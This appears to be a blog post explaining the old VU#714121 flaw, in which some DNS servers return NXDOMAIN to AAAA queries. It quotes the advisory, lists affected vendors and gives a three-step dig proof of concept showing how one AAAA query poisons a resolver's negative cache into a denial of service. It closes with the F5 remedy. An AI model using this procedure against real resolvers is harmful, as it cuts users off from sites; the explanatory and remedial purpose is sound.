This is a weird situation and a misconfiguration on DNS servers that can be exploited using a simple AAAA DNS query. It causes a localized denial-of-service situation where users behind a specific resolver will get:
```
Error:
Unable to determine IP address from host name www.somevulnerablesite.com
The DNS server returned: Name Error: The domain name does not exist.
This means that the cache was not able to resolve the hostname presented in the URL.
Check if the address is correct.
Your cache administrator is root.
```
Before you read this article, you should read about AAAA records (IPv6 addresses in the Domain Name System). The following section is taken directly from Vulnerability Note VU#714121.
Overview
Some DNS servers respond with an inappropriate error message if queried for nonexistent AAAA records, which can lead to possible denial of service.
Description
Some DNS servers respond with a "Name Error" response code (NXDOMAIN, RCODE 3) instead of "No Error" (RCODE 0) when queried for a nonexistent AAAA record. (AAAA records are used to provide name-to-address resolution for IPv6 addresses, as described in RFC1886.)
When an NXDOMAIN response code is received, the querying resolver will usually stop attempting to resolve that name. Resolvers that support negative caching (RFC2308) and receive an NXDOMAIN response will not query for A records for the same resource until the negatively cached error response has expired.
Sites operating DNS servers that respond to queries for nonexistent AAAA records with NXDOMAIN response codes may be susceptible to attackers using other sites' caching nameservers to block those other sites' users from resolving records in domains served by the broken DNS servers. Similar attacks may be possible against caching resolvers if an attacker were able to cause the resolver to look up a nonexistent AAAA record from a server acting in this manner.
Note: The same issue occurs with A6 records. However, A6 records (RFC2874) have been deemed "Experimental" by the IETF, with preference being given to AAAA records (RFC3363, RFC3364).
This is not a new issue. The NXDOMAIN-in-response-to-AAAA-query issue was noted in the (now expired) Internet Draft draft-itojun-jinmei-ipv6-issues-00.txt:
There are broken DNS servers that return NXDOMAIN against AAAA queries, when it should return NOERROR with empty return records. When deploying IPv6/v4 dual stack node, it becomes a problem because dual stack nodes would query AAAA first, see NXDOMAIN error, and won't try to query A records. These broken DNS servers need to be corrected.
However, we have not seen this issue documented elsewhere as a potential denial-of-service attack vector against sites with their DNS servers broken in this manner.
Impact
An attacker could cause a localized denial-of-service condition by exploiting this vulnerability.
Solution
Apply a patch from your vendor.
Systems Affected
Usually BIND 8.2 or later versions are not affected. However, see below:
| Vendor | Status | Date Notified | Date Updated |
|---|---|---|---|
| Cisco Systems Inc. | Affected | 21 Mar 2003 | 23 May 2003 |
| F5 Networks | Not | 21 Mar 2003 | 23 May 2003 |
| djbdns | Unknown | 21 Mar 2003 | 21 Mar 2003 |
| ISC | Unknown | 21 Mar 2003 | 21 Mar 2003 |
| Microsoft Corporation | Unknown | 21 Mar 2003 | 21 Mar 2003 |
| Openwall GNU/*/Linux | Unknown | 21 Mar 2003 | 21 Mar 2003 |
Reproducing NXDOMAIN responses using AAAA queries
This is a proof of concept. Outputs are modified to hide identities.
Step 1: Check standard A record response
Doing a simple dig request to resolv2.technoused.blogspot.com for www.somevulnerablesite.com.
Got a response with AUTHORITY: 2.
```
[user@blackmoreops-resolver2 ]# dig www.somevulnerablesite.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 150580
;; flags: ar bd ca; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUESTION SECTION:
;www.somevulnerablesite.com. IN A
;; ANSWER SECTION:
www.somevulnerablesite.com. 30 IN A 100.100.100.100
;; AUTHORITY SECTION:
somesite.srd.com. 2705 IN NS loadbalancer1.xyz.com.
somesite.srd.com. 2705 IN NS loadbalancer2.xyz.com.
;; ADDITIONAL SECTION:
loadbalancer1.xyz.com. 18 IN A 200.200.200.200
loadbalancer2.xyz.com. 191 IN A 200.200.200.201
;; Query time: 23 msec
;; SERVER: 221.221.221.221#53(221.221.221.221)
;; WHEN: quarta-feira Jan 3 23:04:51 2014
;; MSG SIZE rcvd: 150
```
Step 2: Request AAAA response
Doing a simple dig AAAA request for www.somevulnerablesite.com. Got an NXDOMAIN response with AUTHORITY: 1.
Also note that the AUTHORITY section changed and we are missing the DNS glue (Additional Section).
Note: This is where it goes wrong, as we just received an NXDOMAIN response from an AUTHORITATIVE server.
This NXDOMAIN is now cached for 20 minutes (the SOA minimum of 1200 seconds).
```
[user@blackmoreops-resolver2 ]# dig AAAA www.somevulnerablesite.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 24603
;; flags: ar bd ca; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;www.somevulnerablesite.com. IN AAAA
;; AUTHORITY SECTION:
somesite.srd.com. 1200 IN SOA loadbalancer2.xyz.com. hostmaster.removedaddress.com. 2014031841 3600 900 2207600 1200
;; Query time: 23 msec
;; SERVER: 221.221.221.221#53(221.221.221.221)
;; WHEN: quarta-feira Jan 3 23:05:02 2014
;; MSG SIZE rcvd: 120
```
Step 3: Any subsequent dig requests will give NXDOMAIN responses
Doing a simple dig request for www.somevulnerablesite.com.
Got an NXDOMAIN response with AUTHORITY: 1.
This happens because an NXDOMAIN takes precedence for both IPv4 and IPv6 (and it is now cached).
```
[user@blackmoreops-resolver2 ]# dig www.somevulnerablesite.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 24179
;; flags: ar bd ca; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;www.somevulnerablesite.com. IN A
;; AUTHORITY SECTION:
somesite.srd.com. 1196 IN SOA loadbalancer2.xyz.com. hostmaster.removedaddress.com. 2014031841 3600 900 2207600 1200
;; Query time: 0 msec
;; SERVER: 221.221.221.221#53(221.221.221.221)
;; WHEN: quarta-feira Jan 3 23:05:02 2014
;; MSG SIZE rcvd: 120
```
In this particular case, it was a misconfigured F5 GTM (Global Traffic Manager) and the solution was forwarded to the Network Admin of the vulnerable site.
F5 Solution
http://support.f5.com/kb/en-us/solutions/public/7000/800/sol7851.html
However, even though F5s can be synced, you need to configure the WIP IPv6 NoError response on each F5 manually (F5 v9 and F5 v10 come in pairs; starting with v11, you can have more than two), as that part of the config is not in the shared directory (i.e. /config).
Conclusion
This is a very simple denial-of-service attack and extremely tough to detect, as DNS is the last place a network admin would look. It affects Cisco Systems, F5 GTMs, djbdns, ISC, Microsoft DNS and Openwall GNU/*/Linux DNS servers. In most cases it is caused when the same DNS server has been used for a long time and IPv6 was never taken into account. New installations of DNS servers usually handle this well: in case of a AAAA request they send a NOERROR response.
Interestingly, Google seems to be immune to this NXDOMAIN caching; I am not sure if Google uses dig +trace to determine a DNS response or if they are breaking the RFC by not respecting an NXDOMAIN response from an authoritative server. Either way, if you're using Google DNS resolvers, you're safe. But secured resolvers usually cache NXDOMAIN responses for 10-20 minutes, and by sending this AAAA request you can make a domain unavailable for all users behind that resolver.
Also know that all the vendors fixed this issue (at least the ones using BIND 8.2 or later), but you still find those few older versions in the wild sometimes.
Useful resources
- Vulnerability Note VU#714121 – Incorrect NXDOMAIN responses from AAAA queries could displace denial-of-service conditions
- Cisco Systems Inc. Information for VU#714121 – Incorrect NXDOMAIN responses from AAAA queries could displace denial-of-service conditions
- F5 Networks Information for VU#714121 Incorrect NXDOMAIN responses from AAAA queries could displace denial-of-service conditions
- sol7851: Configuring the BIG-IP GTM or Link Controller systems to supply NOERROR responses for IPv6 queries
- ISC BIND AAAA denial of service (DNS_Bind_AAAA_RPZ_DoS)
- ISC BIND DNS64 Nameserver Response Policy Zone AAAA Record Query Remapping Remote DoS Vulnerability
- DNS Best Practices, Network Protections, and Attack Identification